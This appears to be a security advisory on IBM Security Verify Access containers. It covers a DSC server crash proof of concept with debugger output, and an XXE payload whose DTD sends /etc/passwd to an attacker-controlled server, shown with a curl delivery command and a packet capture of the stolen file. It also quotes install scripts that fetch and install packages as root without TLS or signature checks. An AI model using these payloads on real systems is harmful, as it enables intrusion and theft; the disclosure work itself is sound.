(gdb) c\n    Continuing. \n    [----------------------------------registers-----------------------------------]\n    RAX: 0x0 \n    RBX: 0x7fec38006110 --\u003e 0x7fecaf4df160 --\u003e 0x7fecaf280e20 --\u003e 0x4100261081058b48 \n    RCX: 0x7fec38000b60 --\u003e 0x1000100030005 \n    RDX: 0x7fec38025900 --\u003e 0x7fec38021c90 --\u003e 0x7fec38026230 --\u003e 0x7fec38025dc0 --\u003e 0x0 \n    RSI: 0x4 \n    RDI: 0x0 \n    RBP: 0x7fec2804f7c0 --\u003e 0x7fecb0297548 --\u003e 0x7fecb0079560 --\u003e 0x480021e921058b48 \n    RSP: 0x7feca642fc10 --\u003e 0x1d2e480 --\u003e 0x7fecaf4dfbf8 --\u003e 0x7fecaf292870 --\u003e 0x410024f509058b48 \n    RIP: 0x7fecb007a595 --\u003e 0x48ffffca04e8188b \n    R8 : 0x7fec38000b74 --\u003e 0x3000600060005 \n    R9 : 0x4 \n    R10: 0x2f (\u0027/\u0027)\n    R11: 0x7fecaabb2674 --\u003e 0x29058b48fb894853 \n    R12: 0xffffffff \n    R13: 0x7feca642fca0 --\u003e 0x7fec380312f0 (\"/DSess/services/DSess\")\n    R14: 0x7feca642fce0 --\u003e 0x7feca642fcf0 --\u003e 0x7f00676e6970 \n    R15: 0x0\n    EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)\n    [-------------------------------------code-------------------------------------]\n       0x7fecb007a58a \u003c_ZN12DSessWrapper4pingEPv+154\u003e:      call   QWORD PTR [rax+0x38]\n       0x7fecb007a58d \u003c_ZN12DSessWrapper4pingEPv+157\u003e:      mov    esi,0x4\n       0x7fecb007a592 \u003c_ZN12DSessWrapper4pingEPv+162\u003e:      mov    rdi,rax\n    =\u003e 0x7fecb007a595 \u003c_ZN12DSessWrapper4pingEPv+165\u003e:      mov    ebx,DWORD PTR [rax]\n       0x7fecb007a597 \u003c_ZN12DSessWrapper4pingEPv+167\u003e:      call   0x7fecb0076fa0 \u003c_ZdlPvm@plt\u003e\n       0x7fecb007a59c \u003c_ZN12DSessWrapper4pingEPv+172\u003e:      mov    rdi,QWORD PTR [rsp+0x18]\n       0x7fecb007a5a1 \u003c_ZN12DSessWrapper4pingEPv+177\u003e:      mov    rax,QWORD PTR [rdi]\n       0x7fecb007a5a4 \u003c_ZN12DSessWrapper4pingEPv+180\u003e:      call   QWORD PTR [rax+0x2f0]\n    [------------------------------------stack-------------------------------------]\n    0000| 0x7feca642fc10 --\u003e 0x1d2e480 --\u003e 0x7fecaf4dfbf8 --\u003e 0x7fecaf292870 --\u003e 0x410024f509058b48 \n    0008| 0x7feca642fc18 --\u003e 0x7fecaf292d8e --\u003e 0xda89481d74c08548 \n    0016| 0x7feca642fc20 --\u003e 0x7fec28040830 --\u003e 0x7fecaf4e00a0 --\u003e 0x7fecaf29b5a0 --\u003e 0x4100246a21058b48 \n    0024| 0x7feca642fc28 --\u003e 0x1e3f6e0 --\u003e 0x7fecaf4e1120 --\u003e 0x7fecaf2b2450 --\u003e 0x530022f9a9058b48 \n    0032| 0x7feca642fc30 --\u003e 0x7feca642fc80 --\u003e 0x7feca642fc90 --\u003e 0x7fec30071c00 --\u003e 0x50 (\u0027P\u0027)\n    0040| 0x7feca642fc38 --\u003e 0x7fec3800e720 --\u003e 0x7fecaf4dece8 --\u003e 0x7fecaf27a770 --\u003e 0x4800267369058b48 \n    0048| 0x7feca642fc40 --\u003e 0x7fec38006110 --\u003e 0x7fecaf4df160 --\u003e 0x7fecaf280e20 --\u003e 0x4100261081058b48 \n    0056| 0x7feca642fc48 --\u003e 0x7fecaf27a8a1 --\u003e 0xf2e668debc48941 \n    [------------------------------------------------------------------------------]\n    Legend: code, data, rodata, value\n    Stopped reason: SIGSEGV\n    0x00007fecb007a595 in DSessWrapper::ping(void*) () from target:/lib64/libamdsc_interface.so\n    gdb-peda$ bt\n    #0  0x00007fecb007a595 in DSessWrapper::ping(void*) () from target:/lib64/libamdsc_interface.so\n    #1  0x00007fecaf27a8a1 in tivsec_axiscpp::ServerAxisEngine::invoke(tivsec_axiscpp::MessageData*) () from target:/lib64/libtivsec_axis_server.so\n    #2  0x00007fecaf27b0d2 in tivsec_axiscpp::ServerAxisEngine::process(tivsec_axiscpp::SOAPTransport*) () from target:/lib64/libtivsec_axis_server.so\n    #3  0x00007fecaf297156 in process_request(tivsec_axiscpp::SOAPTransport*) () from target:/lib64/libtivsec_axis_server.so\n    #4  0x00007fecb02a3293 in AMWSMSServiceClient::processRequest(AMWSMSService::WorkerRequest\u0026, bool) () from target:/lib64/libamdsc_server.so\n    #5  0x00007fecb02a3ff8 in AMWSMSService::workerThreadRun() () from target:/lib64/libamdsc_server.so\n    #6  0x00007fecb02a4089 in start_worker_thread () from target:/lib64/libamdsc_server.so\n    #7  0x00007fecaec801ca in start_thread () from target:/lib64/libpthread.so.0\n    #8  0x00007fecae6d3d83 in clone () from target:/lib64/libc.so.6\n\nI can also confirm the null pointer dereference in the `dmesg` output of the `container-02` test server:\n\n    [899328.145854] dscd[2106406]: segfault at 0 ip 00007f18e53ff595 sp 00007f18db93ac10 error 4 in libamdsc_interface.so[7f18e53ec000+30000]\n    [899485.595069] dscd[2107491]: segfault at 0 ip 00007f25a6041595 sp 00007f259c9cdc10 error 4 in libamdsc_interface.so[7f25a602e000+30000]\n    [899575.542524] dscd[2109718]: segfault at 0 ip 00007f331fde5595 sp 00007f3316938c10 error 4 in libamdsc_interface.so[7f331fdd2000+30000]\n    [899614.404309] dscd[2111181]: segfault at 0 ip 00007fec9cad4595 sp 00007fec9d29dc10 error 4 in libamdsc_interface.so[7fec9cac1000+30000]\n    [899761.869511] dscd[2112040]: segfault at 0 ip 00007f86cf8a0595 sp 00007f86c5edfc10 error 4 in libamdsc_interface.so[7f86cf88d000+30000]\n\nI can confirm the verify-access-dsc instance crashes on container-02 as shown below. \n\nBefore the PoC, the verify-access-dsc instance is running:\n\n    [root@container-02]# podman ps\n    CONTAINER ID  IMAGE                                                COMMAND       CREATED       STATUS                       PORTS                             NAMES\n    e462789b901b  ibmcom/verify-access-runtime/10.0.4.0:20220926.6                     28 hours ago  Up 28 hours ago (healthy)    0.0.0.0:9443-\u003e9443/tcp            verify-access-runtime\n    0ff1b85073d6  ibmcom/verify-access-dsc/10.0.4.0:20220926.6                         28 hours ago  Up 28 minutes ago (healthy)  0.0.0.0:8443-8444-\u003e8443-8444/tcp  verify-access-dsc\n\nAfter the PoC, the verify-access-dsc instance does not run anymore:\n\n    [root@container-02]# podman ps\n    CONTAINER ID  IMAGE                                                COMMAND       CREATED       STATUS                     PORTS                     NAMES\n    e462789b901b  ibmcom/verify-access-runtime/10.0.4.0:20220926.6                     28 hours ago  Up 28 hours ago (healthy)  0.0.0.0:9443-\u003e9443/tcp    verify-access-runtime\n    [root@container-02]#\n\nAn attacker with the dsc-client SSL certificate can crash the DSC servers and crash the entire authentication system. \n\n\n\n## Details - XML External Entity (XXE) in dscd \n\nIt was observed that the DSC (Distributed Session Cache) servers are vulnerable to XML External Entity (XXE) attacks. DSC servers are used to store session information. \n\nThe DSC servers are reachable using the `/DSess/services/DSess` API running on port 8443/tcp. \n\nWith a client certificate, we can reach the `/DSess/services/DSess` API. \n\nContent of the `payload.txt` file containing the XXE payload that will be sent to the remote DSC server:\n\n    \u003c?xml version=\"1.0\" encoding=\"utf-8\" ?\u003e\n    \u003c!DOCTYPE foo [\n    \u003c!ENTITY % xxe SYSTEM \"http://10.0.0.45/dtd.xml\"\u003e\n    %xxe;\n    ]\u003e\n    \u003cfoo\u003e\u003c/foo\u003e\n    \u003cSOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\u003e\n            \u003cSOAP-ENV:Body\u003e\n                    \u003cns1:ping xmlns:ns1=\"http://sms.am.tivoli.com\"\u003e\n                            \u003cns1:something\u003eX\u003c/ns1:something\u003e\n                    \u003c/ns1:ping\u003e\n            \u003c/SOAP-ENV:Body\u003e\n    \u003c/SOAP-ENV:Envelope\u003e\n\n\nContent of the `dtd.xml` file hosted on http://10.0.0.45/. This DTD file is referenced by the `payload.txt` file:\n\n    kali% cat /var/www/html/dtd.xml \n    \u003c!ENTITY % file SYSTEM \"file:///etc/passwd\"\u003e\n    \u003c!ENTITY % eval \"\u003c!ENTITY \u0026#x25; exfiltrate SYSTEM \u0027http://10.0.0.45/?x=%file;\u0027\u003e\"\u003e\n    %eval;\n    %exfiltrate;\n\nSending the previous payload will result in an exception on the remote DSC server:\n\n    kali% curl --key dsc-client.key --cert dsc-client.pem --show-error --insecure https://dsc-02.test.lan:8443/DSess/services/DSess -H \u0027SOAPAction: \"ping\"\u0027 --data \u0027@payload.txt\u0027 -v\n    *   Trying 10.0.0.16:8443... \n    * Connected to dsc-02.test.lan (10.0.0.16) port 8443 (#0)\n    [...]\n    \u003e POST /DSess/services/DSess HTTP/1.1\n    \u003e Host: dsc-02.test.lan:8443\n    \u003e User-Agent: curl/7.82.0\n    \u003e Accept: */*\n    \u003e SOAPAction: \"ping\"\n    \u003e Content-Length: 453\n    \u003e Content-Type: application/x-www-form-urlencoded\n    \u003e \n    * Mark bundle as not supporting multiuse\n    \u003c HTTP/1.1 200 OK\n    \u003c Server: Apache Axis C++/1.6.a\n    \u003c Connection: close\n    \u003c Content-Length: 330\n    \u003c Content-Type: text/xml\n    \u003c \n    \u003c?xml version=\u00271.0\u0027 encoding=\u0027utf-8\u0027 ?\u003e\n    \u003cSOAP-ENV:Envelope\u003e\n    \u003cSOAP-ENV:Body\u003e\n    \u003cSOAP-ENV:Fault\u003e\n    \u003cfaultcode\u003eSOAP-ENV:Server\u003c/faultcode\u003e\n    \u003cfaultstring\u003eUnknown exception\u003c/faultstring\u003e\n    \u003cfaultactor\u003eserver name:listen port\u003c/faultactor\u003e\n    \u003cdetail\u003eUnknown Exception has occured\u003c/detail\u003e\n    \u003c/SOAP-ENV:Fault\u003e\n    \u003c/SOAP-ENV:Body\u003e\n    \u003c/SOAP-ENV:Envelope\u003e\n    \n    * Closing connection 0\n    * TLSv1.2 (OUT), TLS alert, close notify (256):\n\n\nAt the same time, when sniffing the HTTP connections to the remote HTTP server providing `http://10.0.0.45/?x=%file`, we can observe HTTP requests from the DSC server (acting as a HTTP client). \n\nThere is a successful exfiltration of the `/etc/passwd` file of the DSC instance - this file was specified in the `dtd.xml` file at `http://10.0.0.45/dtd.xml`, used by the malicious payload:\n\n    kali# tcpdump -n -i eth0 -s0 -X port 80\n    tcpdump: verbose output suppressed, use -v[v]... for full protocol decode\n    listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes\n    10:01:12.655204 IP 10.0.0.16.60254 \u003e 10.0.0.45.80: Flags [P.], seq 1:753, ack 1, win 229, options [nop,nop,TS val 2959987485 ecr 3936552717], length 752: HTTP: GET /root:x:0:0:root:/root:/bin/bash\n    [...]\n        0x0030:  eaa3 070d 4745 5420 2f72 6f6f 743a 783a  ....GET./root:x:\n        0x0040:  303a 303a 726f 6f74 3a2f 726f 6f74 3a2f  0:0:root:/root:/\n        0x0050:  6269 6e2f 6261 7368 0a62 696e 3a78 3a31  bin/bash.bin:x:1\n        0x0060:  3a31 3a62 696e 3a2f 6269 6e3a 2f73 6269  :1:bin:/bin:/sbi\n        0x0070:  6e2f 6e6f 6c6f 6769 6e0a 6461 656d 6f6e  n/nologin.daemon\n        0x0080:  3a78 3a32 3a32 3a64 6165 6d6f 6e3a 2f73  :x:2:2:daemon:/s\n        0x0090:  6269 6e3a 2f73 6269 6e2f 6e6f 6c6f 6769  bin:/sbin/nologi\n        0x00a0:  6e0a 6164 6d3a 783a 333a 343a 6164 6d3a  n.adm:x:3:4:adm:\n        0x00b0:  2f76 6172 2f61 646d 3a2f 7362 696e 2f6e  /var/adm:/sbin/n\n        0x00c0:  6f6c 6f67 696e 0a6c 703a 783a 343a 373a  ologin.lp:x:4:7:\n        0x00d0:  6c70 3a2f 7661 722f 7370 6f6f 6c2f 6c70  lp:/var/spool/lp\n        0x00e0:  643a 2f73 6269 6e2f 6e6f 6c6f 6769 6e0a  d:/sbin/nologin. \n        0x00f0:  7379 6e63 3a78 3a35 3a30 3a73 796e 633a  sync:x:5:0:sync:\n        0x0100:  2f73 6269 6e3a 2f62 696e 2f73 796e 630a  /sbin:/bin/sync. \n        0x0110:  7368 7574 646f 776e 3a78 3a36 3a30 3a73  shutdown:x:6:0:s\n        0x0120:  6875 7464 6f77 6e3a 2f73 6269 6e3a 2f73  hutdown:/sbin:/s\n        0x0130:  6269 6e2f 7368 7574 646f 776e 0a68 616c  bin/shutdown.hal\n        0x0140:  743a 783a 373a 303a 6861 6c74 3a2f 7362  t:x:7:0:halt:/sb\n        0x0150:  696e 3a2f 7362 696e 2f68 616c 740a 6d61  in:/sbin/halt.ma\n        0x0160:  696c 3a78 3a38 3a31 323a 6d61 696c 3a2f  il:x:8:12:mail:/\n        0x0170:  7661 722f 7370 6f6f 6c2f 6d61 696c 3a2f  var/spool/mail:/\n        0x0180:  7362 696e 2f6e 6f6c 6f67 696e 0a6f 7065  sbin/nologin.ope\n        0x0190:  7261 746f 723a 783a 3131 3a30 3a6f 7065  rator:x:11:0:ope\n        0x01a0:  7261 746f 723a 2f72 6f6f 743a 2f73 6269  rator:/root:/sbi\n        0x01b0:  6e2f 6e6f 6c6f 6769 6e0a 6761 6d65 733a  n/nologin.games:\n        0x01c0:  783a 3132 3a31 3030 3a67 616d 6573 3a2f  x:12:100:games:/\n        0x01d0:  7573 722f 6761 6d65 733a 2f73 6269 6e2f  usr/games:/sbin/\n        0x01e0:  6e6f 6c6f 6769 6e0a 6674 703a 783a 3134  nologin.ftp:x:14\n        0x01f0:  3a35 303a 4654 5020 5573 6572 3a2f 7661  :50:FTP.User:/va\n        0x0200:  722f 6674 703a 2f73 6269 6e2f 6e6f 6c6f  r/ftp:/sbin/nolo\n        0x0210:  6769 6e0a 6e6f 626f 6479 3a78 3a36 3535  gin.nobody:x:655\n        0x0220:  3334 3a36 3535 3334 3a4b 6572 6e65 6c20  34:65534:Kernel. \n        0x0230:  4f76 6572 666c 6f77 2055 7365 723a 2f3a  Overflow.User:/:\n        0x0240:  2f73 6269 6e2f 6e6f 6c6f 6769 6e0a 6973  /sbin/nologin.is\n        0x0250:  616d 3a78 3a36 3030 303a 3630 3030 3a3a  am:x:6000:6000::\n        0x0260:  2f68 6f6d 652f 6973 616d 3a2f 6269 6e2f  /home/isam:/bin/\n        0x0270:  6261 7368 0a69 766d 6772 3a78 3a36 3030  bash.ivmgr:x:600\n        0x0280:  313a 3630 3031 3a41 6363 6573 7320 4d61  1:6001:Access.Ma\n        0x0290:  6e61 6765 7220 5573 6572 3a2f 6f70 742f  nager.User:/opt/\n        0x02a0:  506f 6c69 6379 4469 7265 6374 6f72 3a2f  PolicyDirector:/\n        0x02b0:  6269 6e2f 6661 6c73 650a 7469 766f 6c69  bin/false.tivoli\n        0x02c0:  3a78 3a36 3030 323a 3630 3032 3a4f 776e  :x:6002:6002:Own\n        0x02d0:  6572 206f 6620 5469 766f 6c69 2043 6f6d  er.of.Tivoli.Com\n    [...]\n\nAn attacker can read any file located in the instance - the DSC server will send any file specified in the payload to an attacker-controlled HTTP server. \n\nAn attacker with the dsc-client SSL certificate can exfiltrate any sensitive information from the instance. \n\n\n\n## Details - Remote Code Execution due to insecure download of rpm and zip files in verify-access-dsc, verify-access-runtime and verify-access-wrp (/usr/sbin/install_isva.sh)\n\nIt was observed that the Docker images verify-access-dsc ,verify-access-runtime and verify-access-wrp use insecure communications to download several rpm and zip files that will then be installed or decompressed as root. \n\nThe `/usr/sbin/install_isva.sh` script contains insecure downloading of rpm files and zip files. These rpm files will then be installed as root. \n\nAn attacker located on the network can inject malicious rpm or zip files into the authentication platform and take control over the entire authentication platform. \n\nThere are 3 different `/usr/sbin/install_isva.sh` scripts found in these images but they share the same vulnerable code:\n\n    kali-docker# sha256sum **/install_isva.sh   \n    1c851f579baeda9d3c11e7721aaa5960dc6a3d6b052bcc8a46979d0634e31892  _verify-access-dsc.tar/787d9cec79e27fccd75a56b7101b39da38161f9d3749d6d0fd7cfcc8252aca34/usr/sbin/install_isva.sh\n    00f2ca8ad004af9c9e16b6cfdf480dcdb52dc36c7ff64df2bcc34495f6a9ae8d  _verify-access-runtime.tar/694cb5f84eff9a4b0aac37a4bd9f65116051953f3aee5e4e998af5938e684a5e/usr/sbin/install_isva.sh\n    8a59d7f89c6d587d9b764b9e4748cf0d20d406f65433a813464b32a13745f6da  _verify-access-wrp.tar/937031a6ab4bc7bd504dcbee8d242f181e904c1722489077cf468daae176e2da/usr/sbin/install_isva.sh\n\nVulnerable code in verify-access-dsc - download over HTTP or without checking the SSL certificate (lines 24, 60 and 82) and installation of packages as root without checking the signatures (line 76):\n\nContent of `/usr/sbin/install_isva.sh` in verify-access-dsc:\n\n[code:shell]\n22 files=/root/files.txt\n23 \n24 curl -k ${WEBSERVER}/ -o $files \n[...]\n38 #\n39 # Install each of our RPMs. \n40 #\n41 \n42 pkgs=\"gskcrypt64 \\\n43         gskssl64 \\\n44         Base-ISVA \\\n45         idsldap-license64 \\\n46         idsldap-cltbase64 \\\n47         idsldap-clt64bit64 \\\n48         Pdlic-PD \\\n49         TivSecUtl-TivSec \\\n50         PDRTE-PD \\\n51         PDWebRTE-PD \\\n52         PDWebDSC-PD\"\n53 \n54 for pkg in $pkgs; do\n55     echo \"Installing $pkg\"\n56 \n57     # Download and install the file. \n58     rpm_file=`locate_rpm_file $pkg`\n59 \n60     curl -fail -s -k ${WEBSERVER}/$rpm_file -o /root/$rpm_file\n[...]\n76     rpm -i $extra_args /root/$rpm_file\n[...]\n78     # Download the include file and delete all files not included in the file. \n79     include=`rpm -qp /root/$rpm_file --qf \"%{NAME}.include\"`\n80     include_file=/root/$include\n81 \n82     set +e; curl --fail -s -k ${WEBSERVER}/$include -o $include_file; rc=$?; set -e\n83 \n84     if [ $rc -eq 0 -a -f $include_file ] ; then\n85         # Convert the include file to be regular expression based instead of\n86         # glob based. \n87         sed -i \"s|\\*|.*|g\" $include_file\n88 \n89         for entry in `rpm -ql /root/$rpm_file | grep -xvf $include_file`; do\n90             if [ -f $entry ] ; then\n91                 rm -f $entry\n92             fi\n93         done\n94     fi\n[/code]\n\nThe code in verify-access-wrp is also very similar and shares the same vulnerabilities. \n\nVulnerable code in verify-access-runtime - same vulnerability in `/usr/sbin/install_isva.sh` with an additional vulnerability with the insecure download, due to the `-k` option on line 117 (alias to `--insecure`) and extraction of zip files as root in line 119:\n\n[code:shell]\n28 files=/root/files.txt\n29 \n30 curl -k ${WEBSERVER}/ -o $files\n[...]\n41 pkgs=\"gskcrypt64 \\\n42         gskssl64 \\\n43         Base-ISVA \\\n44         PDlic-PD \\\n45         TivSecUtl-TivSec \\\n46         PDRTE-PD \\\n47         PDWebWAPI-PD \\\n48         PDWebDSC-PD \\\n49         VerifyAccessRuntimeFeatures \\\n50         MesaConfig \\\n51         FIM \\\n52         RBA\"\n53 \n54 for pkg in $pkgs; do\n55     echo \"Installing $pkg\"\n56 \n57     # Download and install the file. \n58     rpm_file=`locate_rpm_file $pkg`\n59 \n60     curl --fail -s -k ${WEBSERVER}/$rpm_file -o /root/$rpm_file\n[...]\n78     rpm -i $extra_args /root/$rpm_file\n79 \n80     # Download the include file and delete all files not included in the file. \n81     include=`rpm -qp /root/$rpm_file --qf \"%{NAME}.include\"`\n82     include_file=/root/$include\n83 \n84     set +e; curl --fail -s -k ${WEBSERVER}/$include -o $include_file; rc=$?; set -e\n85 \n86     if [ $rc -eq 0 -a -f $include_file ] ; then\n87         # Convert the include file to be regular expression based instead of\n88         # glob based. \n89         sed -i \"s|\\*|.*|g\" $include_file\n90 \n91         for entry in `rpm -ql /root/$rpm_file | grep -xvf $include_file`; do\n92             if [ -f $entry ] ; then\n93                 rm -f $entry\n94             fi\n95         done\n96     fi\n[...]\n108 zips=\"\\\n109     com.ibm.tscc.rtss.wlp.zip:/opt/rtss \\\n110     com.ibm.isam.common.eclipse.wlp.zip:/opt/IBM \\\n111     pdjrte-0.0.0-0.zip:/opt\"\n112 \n113 for entry in $zips; do\n114     zip=`echo $entry | cut -f 1 -d \u0027:\u0027`\n115     dst=`echo $entry | cut -f 2 -d \u0027:\u0027`\n116 \n117     curl --fail -s -k ${WEBSERVER}/$zip -o /root/$zip\n118     mkdir -p $dst\n119     unzip -q /root/$zip -d $dst\n120 \n121     rm -f /root/$zip\n122 done\n[/code]\n\n\n\n## Details - Remote Code Execution due to insecure download of rpm in verify-access-runtime (/usr/sbin/install_java_liberty.sh)\n\nIt was observed that the Docker image verify-access-runtime insecurely downloads zip files. \n\nAn attacker located on the network can inject malicious zip files into the platform and take control over the entire platform. \n\nThe `/usr/sbin/install_java_liberty.sh` script contains insecure downloading of zip files. These zip files will then be extracted as root into the `/opt/java`, `/opt/ibm`, `/opt/oracle/jdbc` and `/opt/IBM/db2` directories, providing WebSphere Liberty binaries (that will then be used to provide executable code). \n\nIt is also possible to remotely delete any file as root (lines 61 to 65). \n\nVulnerable code in `/usr/sbin/install_java_liberty.sh`:\n\n[code:shell]\n14 web_files=/root/files.txt\n15 \n16 locate_file()\n17 {\n18     grep \"$1\" $web_files | cut -f 2 -d \u0027\"\u0027\n19 }\n20 curl -k ${WEBSERVER}/ -o $web_files\n21\n[...]\n29 #\n30 # Install each of our zip files. \n31 #\n32 \n33 zips=\"\\\n34     ibm-semeru-open-jre_x64_linux_11.*.tar.gz:/opt/java \\\n35     liberty.*.zip:/opt/ibm \\\n36     oracle_jdbc_.*.zip:/opt/oracle/jdbc \\\n37     ibm-db2-jdbc.*.tar.gz:/opt/IBM/db2\"\n38 \n39 for entry in $zips; do\n40     zip=`echo $entry | cut -f 1 -d \u0027:\u0027`\n41     dst=`echo $entry | cut -f 2 -d \u0027:\u0027`\n42 \n43     # Download and install the file. \n44     zip_file=`locate_file $zip`\n45 \n46     curl --fail -s -k ${WEBSERVER}/$zip_file -o /root/$zip_file\n47 \n48     mkdir -p $dst\n49 \n50     set +e; echo $zip | grep -q .zip; rc=$?; set -e\n51     if [ $rc -eq 0 ] ; then\n52         unzip -q /root/$zip_file -d $dst\n53         exclude=`echo $zip_file | sed \"s|.zip|.exclude|g\"`\n54     else\n55         tar -x -C $dst -f /root/$zip_file\n56         exclude=`echo $zip_file | sed \"s|.tar.gz|.exclude|g\"`\n57     fi\n58 \n59     exclude_file=/root/$exclude\n60 \n61     set +e; curl --fail -s -k ${WEBSERVER}/$exclude -o $exclude_file; rc=$?; set -e\n62 \n63     if [ $rc -eq 0 -a -s $exclude_file ] ; then\n64         cd $dst\n65         cat $exclude_file | xargs rm -rf\n66     fi\n[/code]\n\n\n\n## Details - Remote Code Execution due to insecure Repository configuration\n\nIt was observed that the Docker images verify-access-dsc, verify-access-runtime and verify-access-wrp use insecure CentOS repositories:\n\n- - The transport is done over HTTP (in clear-text) - instead of HTTPS. \n- - The check of the signature is disabled. \n- - These repositories will be enabled by default. \n\nAn attacker located on the network (local network or any Internet router located between the instance and the remote mirror.centos.org server) can inject malicious RPMs and take control over the entire platform. \n\nThe `/usr/sbin/install_system.sh` script in these 3 images will enable 4 remote repositories over HTTP and will disable the check of signature of the downloaded packages from these repositories:\n\n     31 centos_repo_file=\"/etc/yum.repos.d/centos.repo\"\n     32 \n     33 cat \u003c\u003cEOT \u003e\u003e $centos_repo_file\n     34 [CentOS-8_base]\n     35 name = CentOS-8 - Base\n     36 baseurl = http://mirror.centos.org/centos/8-stream/BaseOS/x86_64/os\n     37 gpgcheck = 0\n     38 enabled = 1 \n     39 \n     40 [CentOS-8_appstream]\n     41 name = CentOS-8 - AppStream\n     42 baseurl = http://mirror.centos.org/centos/8-stream/AppStream/x86_64/os\n     43 gpgcheck = 0        \n     44 enabled = 1\n     45 EOT\n    [...]\n     98 #\n     99 # Enable install of the busybox RPM from the Fedora repository. \n    100 #\n    101 \n    102 fedora_repo_file=\"/etc/yum.repos.d/fedora.repo\"\n    103 \n    104 cat \u003c\u003cEOT \u003e\u003e $fedora_repo_file\n    105 [fedora]                                                                                                                                                                                        \n    106 name=Fedora                                                                                                                                                                                     \n    107 metalink=https://mirrors.fedoraproject.org/metalink?repo=fedora-33\u0026arch=x86_64\n    108 enabled=1\n    109 gpgcheck=0\n    110 \n    111 [fedora-updates]\n    112 name=Fedora Updates\n    113 metalink=https://mirrors.fedoraproject.org/metalink?repo=updates-released-f33\u0026arch=x86_64\n    114 enabled=1\n    115 gpgcheck=0\n    116 EOT\n\nIt was confirmed that this configuration appears in the verify-access-runtime instance in the live system:\n\n    [root@container-01]# for i in $(podman ps | grep -v NAMES | awk \u0027{ print $1 }\u0027); do podman ps | grep $i; podman exec -it $i cat /etc/yum.repos.d/centos.repo;echo;done\n    4262005f3646  ibmcom/verify-access/10.0.4.0:20221006.1                         7 hours ago  Up 7 hours ago (healthy)  0.0.0.0:7443-\u003e9443/tcp            verify-access\n    cat: /etc/yum.repos.d/centos.repo: No such file or directory\n    \n    c930c46acd66  ibmcom/verify-access-runtime/10.0.4.0:20221006.1                        7 hours ago  Up 7 hours ago (healthy)  0.0.0.0:9443-\u003e9443/tcp            verify-access-runtime\n    name = CentOS-8 - Base\n    baseurl = http://mirror.centos.org/centos/8-stream/BaseOS/x86_64/os\n    gpgcheck = 0\n    enabled = 1\n    \n    [CentOS-8_appstream]\n    name = CentOS-8 - AppStream\n    baseurl = http://mirror.centos.org/centos/8-stream/AppStream/x86_64/os\n    gpgcheck = 0\n    enabled = 1\n    \n    48f1b1e8f782  ibmcom/verify-access-dsc/10.0.4.0:20221006.1                            7 hours ago  Up 7 hours ago (healthy)  0.0.0.0:8443-8444-\u003e8443-8444/tcp  verify-access-dsc\n    cat: /etc/yum.repos.d/centos.repo: No such file or directory\n    \n    [root@container-01]#\n\nFurthermore, the script `/usr/sbin/install_system.sh` will insecurely download programs and install them as root, using the previous insecure repositories:\n\n[code:shell]\n 48 # Install tools required for container build process. \n 49 #\n 50 \n 51 microdnf -y install unzip shadow-utils jansson openssl libxslt \\\n 52         libnsl2 gzip cpio tar\n[...]\n 55 # We have an issue where RedHat periodically introduces a dependency on\n 56 # openssl-pkcs11.  We don\u0027t actually need this package and so we manually remove\n 57 # it if it has been installed. \n 58 #\n 59 \n 60 if [ `rpm -q -a | grep openssl-pkcs11 | wc -l` -ne 0 ] ; then\n 61     rpm --erase openssl-pkcs11\n 62 fi\n[...]\n 70 rpms=\"\"\n 71 for lang in en cs de es fi fr hu it ja ko nl pl pt ru zh; do\n 72     rpms=\"$rpms glibc-langpack-$lang\"\n 73 done\n[...]\n122 microdnf -y install busybox\n[/code]\n\n\n\n## Details - Additional repository configuration (potential supply-chain attack)\n\nIt was observed that the Docker images verify-access-runtime and verify-access-wrp use a third-party repository configuration, obtained when retrieving the external file at `https://repo.symas.com/configs/SOFL/rhel8/sofl.repo`:\n\nContent of `/usr/sbin/install_system.sh`:\n\n[code:shell]\n47 #\n48 # Install OpenLDAP.  This is no longer provided by CentOS. \n49 #\n50 \n51 sofl_repo_file=\"/etc/yum.repos.d/sofl.repo\"\n52 \n53 curl https://repo.symas.com/configs/SOFL/rhel8/sofl.repo \\\n54     -o $sofl_repo_file\n[/code]\n\nIt was confirmed that this configuration appears in the verify-access-runtime instance in the live system:\n\n    [isam@verify-access-runtime /]$ cat /etc/yum.repos.d/sofl.repo \n    [sofl]\n    name=Symas OpenLDAP for Linux RPM repository\n    baseurl=https://repo.symas.com/repo/rpm/SOFL/rhel8\n    gpgkey=https://repo.symas.com/repo/gpg/RPM-GPG-KEY-symas-com-signing-key\n    gpgcheck=1\n    enabled=1\n    [isam@verify-access-runtime /]$\n\nWhen reading the `/usr/sbin/install_system.sh` script, this repository is used to install an additional package, without checking the signature:\n\n[code:shell]\n58 #\n59 # We want to manually install the openldap server RPM as microdnf pulls\n60 # in a whole heap of dependencies which we don\u0027t require. \n61 #\n62 \n63 baseurl=`grep baseurl $sofl_repo_file | cut -f 2 -d \u0027=\u0027`/x86_64\n64 version=`rpm -q --qf \"%{VERSION}-%{RELEASE}\" symas-openldap`\n65 rpmfile=/tmp/openldap.rpm\n66 \n67 curl $baseurl/symas-openldap-servers-$version.x86_64.rpm -o $rpmfile\n68 \n69 rpm -i --nodeps $rpmfile\n70 \n71 rm -f $rpmfile\n[/code]\n\nThere is a potential supply-chain attack and this dependency is not documented. \n\n\n\n## Details - Remote Code Execution due to insecure /usr/sbin/install_system.sh script in verify-access-runtime\n\nIt was observed that the Docker image verify-access-runtime uses a highly insecure `/usr/sbin/install_system.sh` script. \n\nWith the 2 previous vulnerabilities already explained in Additional repository configuration (potential supply-chain attack) and\nRemote Code Execution due to insecure download of rpm and zip files in verify-access-dsc, verify-access-runtime and verify-access-wrp (/usr/sbin/install_isva.sh),\nthis version adds 2 new vulnerabilities:\n\n- - Installation of 3 packages downloaded over HTTP without checking the signature (lines 82, 84 and 90); and\n- - Replacement of `/usr/share/java/postgresql-jdbc/postgresql.jar` using a postgresql.jar file directly retrieved over HTTP (line 99) and with `-k` (aka `--insecure`). \n\nContent of `/usr/sbin/install_system.sh`:\n\n[code:shell]\n73 #\n74 # For the postgresql packages we need to download and install manually so\n75 # that we don\u0027t also pull in all of the unnecessary dependencies. \n76 #\n77 \n78 centos_base=http://mirror.centos.org/centos/8-stream/AppStream/x86_64/os/Packages/\n79 \n80 rpms=/tmp/rpms.txt\n81 \n82 curl http://mirror.centos.org/centos/8-stream/AppStream/x86_64/os/Packages/ -o $rpms\n83 \n84 for pkg in 